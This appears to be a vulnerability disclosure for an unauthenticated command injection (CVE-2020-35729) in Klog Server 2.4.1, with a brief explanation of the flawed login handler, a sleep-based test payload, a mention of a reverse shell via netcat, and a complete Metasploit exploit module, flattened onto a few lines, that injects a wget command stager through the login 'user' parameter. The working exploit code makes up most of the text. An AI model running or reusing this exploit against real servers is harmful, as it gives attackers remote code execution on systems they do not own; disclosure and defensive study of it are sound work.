KLOG Server Unauthenticated Command Injection (CVE-2020-35729)
As you can see in the code line above , the user input received without any filtering in the login panel is running on the server.The purpose of code line is fail login user save on ‘log.sh’ file found in the path /klog/www/config/scripts/ .Shown below see log.sh source codes.
Where ‘logmsg’ variable holds the user value in here and Var / log / klog / 127.0.0.1 / kaudit.log file is saved as in the code. This situation cause be command injection vulnerability.
In the first step “%26sleep+5%26” payload’s has been sent and it is provided to run on target klog server .This situation Burpsuite is shown below in the screenshot.
Then, in order to automate the reverse shell connection on the server, the exploit shown in the screenshot below, was run and the shell operation was successfully performed in the listening NC connection.
### This module requires Metasploit: http://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::RemoteRank = ExcellentRankinginclude Msf::Exploit::Remote::HttpClientinclude Msf::Exploit::CmdStagerdef initialize(info={})super(update_info(info,'Name' => 'Klog Server Unauthenticated Command Injection Vulnerability','Description' => %q{This module exploits an unauthenticated command injection vulnerability in Klog Server <= 2.4.1."user" parameter is executed via shell_exec() function without input validation.},'License' => MSF_LICENSE,'Author' =>[ 'B3KC4T', # Vulnerability discovery'Metin Yunus Kandemir', # Metasploit module],'References' =>[['CVE', '2020-35729'],['URL', 'https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection']],'DefaultOptions' =>{'HttpClientTimeout' => 2,},'Platform' => [ 'unix', 'linux' ],'Arch' => [ ARCH_X64 ],'Targets' => [['Klog Server 2.4.1 (x64)', {'Platform' => 'linux','Arch' => ARCH_X64,}],],'Privileged' => false,'DisclosureDate' => "2021-01-05",'DefaultTarget' => 0))register_options([Opt::RPORT(443),OptBool.new('SSL', [true, 'Use SSL', true]),OptString.new('TARGETURI', [true, 'The base path of the Klog Server', '/']),])enddef filter_bad_chars(cmd)cmd.gsub!(/chmod \+x/, 'chmod 777')cmd.gsub!(/;/, " %0A ")cmd.gsub!(/ /, '+')cmd.gsub!(/\//, '%2F')enddef execute_command(cmd, opts = {})command_payload = "unsafe+%22%26+#{filter_bad_chars(cmd)}%26%22"print_status("Sending stager payload...")uri = target_uri.pathres= send_request_cgi({'method' => 'POST','uri' => normalize_uri(uri, 'actions', 'authenticate.php'),'encode_params' => false,'vars_post' => {'user' => command_payload,'pswd' => "inline"}})if res && res.code == 302print_error("The target is not vulnerable!")elseprint_good("The target is vulnerable!")endenddef checkuri = target_uri.pathres= send_request_cgi({'method' => 'POST','uri' => normalize_uri(uri, 'actions', 'authenticate.php'),'encode_params' => false,'vars_post' => {'user' => "unsafe+%22%26sleep+40%26%22", #checking blind command injection via sleep'pswd' => "inline"}})if res && res.code == 302return Exploit::CheckCode::Safeelsereturn Exploit::CheckCode::Vulnerableendenddef exploitprint_status("Exploiting...")execute_cmdstager(flavor: :wget, delay: 10)endend
